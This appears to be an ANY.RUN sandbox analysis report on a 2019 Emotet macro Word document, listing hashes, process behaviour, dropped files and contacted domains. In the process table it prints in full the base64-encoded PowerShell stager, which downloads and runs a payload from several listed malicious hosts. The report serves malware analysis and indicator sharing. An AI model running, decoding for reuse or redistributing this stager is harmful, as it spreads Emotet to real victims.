analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

fxcDxjiCijKxHrcNzPQymDUAwgS

Full analysis: https://app.any.run/tasks/71aa6714-a84a-48b6-86ef-5b647dfdc797
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:43:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Books & Music, Subject: JSON, Author: Missouri Hoeger, Keywords: bandwidth, Comments: primary, Template: Normal.dotm, Last Saved By: Alanis Corwin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

8A19585D708831AFE179FABD1BC08BAD

SHA1:

AA71FD10191B7A8E5B2B40136CAAF54142A90AE6

SHA256:

32A27F26DA134AE8E33728157DA7C8586587B223E767CB1771982E77770C5082

SSDEEP:

3072:jeGRyYtKgdzSrGtKyIwLx397JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:jeGRyYtKUzSSnLx3TzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • msptermsizes.exe (PID: 1428)
      • msptermsizes.exe (PID: 2476)
      • 178.exe (PID: 3368)
      • 178.exe (PID: 2864)
    • Emotet process was detected

      • 178.exe (PID: 2864)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2436)
    • Starts itself from another location

      • 178.exe (PID: 2864)
    • Executed via WMI

      • powershell.exe (PID: 2436)
    • Executable content was dropped or overwritten

      • 178.exe (PID: 2864)
      • powershell.exe (PID: 2436)
    • Application launched itself

      • 178.exe (PID: 3368)
    • PowerShell script executed

      • powershell.exe (PID: 2436)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2720)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2720)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Cronin - Morar
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Alanis Corwin
Template: Normal.dotm
Comments: primary
Keywords: bandwidth
Author: Missouri Hoeger
Subject: JSON
Title: Books & Music
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 178.exe no specs #EMOTET 178.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2720"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\fxcDxjiCijKxHrcNzPQymDUAwgS.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2436powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3368"C:\Users\admin\178.exe" C:\Users\admin\178.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2864--3a2e7ef0C:\Users\admin\178.exe
178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
1428"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2476--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 715
Read events
1 222
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2720WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBBA.tmp.cvr
MD5:
SHA256:
2436powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LT2J95KO7Z7TB4425MKF.temp
MD5:
SHA256:
2720WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:A40F3E1E79BE581676DE0F0F782BEA97
SHA256:F74F93B3457414CFA853144E356261AA30FBD7B6472FF0749D81E71A60E58B8D
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B9507.wmfwmf
MD5:1524BF5B989BFACF8313F38AA28D8E59
SHA256:15C5C907A81C2B46540224D96DB6A633F01DD4E4401E2F0F2F3694B6F8027E6D
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFE54BAD.wmfwmf
MD5:8B13B58D637E7367543C66A20DB56AAB
SHA256:CBE2E2A262C5042A4F2B206227E1F2C8E8C935E47FE44B926579635F7B4FB05F
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5041DF3F.wmfwmf
MD5:79578346D7F69B195D077D1FF79534EE
SHA256:80A41C386B4E6A144220AEC01F9156E49F699B127412041B13AC1CCDE9DC0FAC
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26986AA5.wmfwmf
MD5:4EA9ABF040351B59B31DD958BE7EA99C
SHA256:6DC1B136BC6F21A61F9B29EC3ABEC847A3BF73F308951EE3F37210E6FD4C792E
2720WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0DA97163FDEBFAEF04B4154A5B8216B7
SHA256:9229E2C97B8BF46154BD3D26D9F3941F89975DE2735A7B46F86690505905C540
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E828743.wmfwmf
MD5:A533D6F0D2894C38CFF010D3647D1C68
SHA256:1E17CED9D48F7EA242EEBA8FCDD320DD89DD0FE3EF522F966F7D86D9017B0D29
2720WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5888C549.wmfwmf
MD5:345C99FCD8F3742207719B148B6FA381
SHA256:E7722CB425AFAC5E3F6EA00CFF6010448C9B249491BC5BEFD29AABFEADDD8E62
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2436
powershell.exe
146.88.234.116:80
stephporn.com
PlanetHoster
FR
suspicious
2436
powershell.exe
35.238.93.185:443
e-centricity.com
US
unknown
2436
powershell.exe
43.255.154.26:443
thehopeherbal.com
GoDaddy.com, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
stephporn.com
  • 146.88.234.116
suspicious
thehopeherbal.com
  • 43.255.154.26
suspicious
e-centricity.com
  • 35.238.93.185
malicious

Threats

No threats detected
No debug info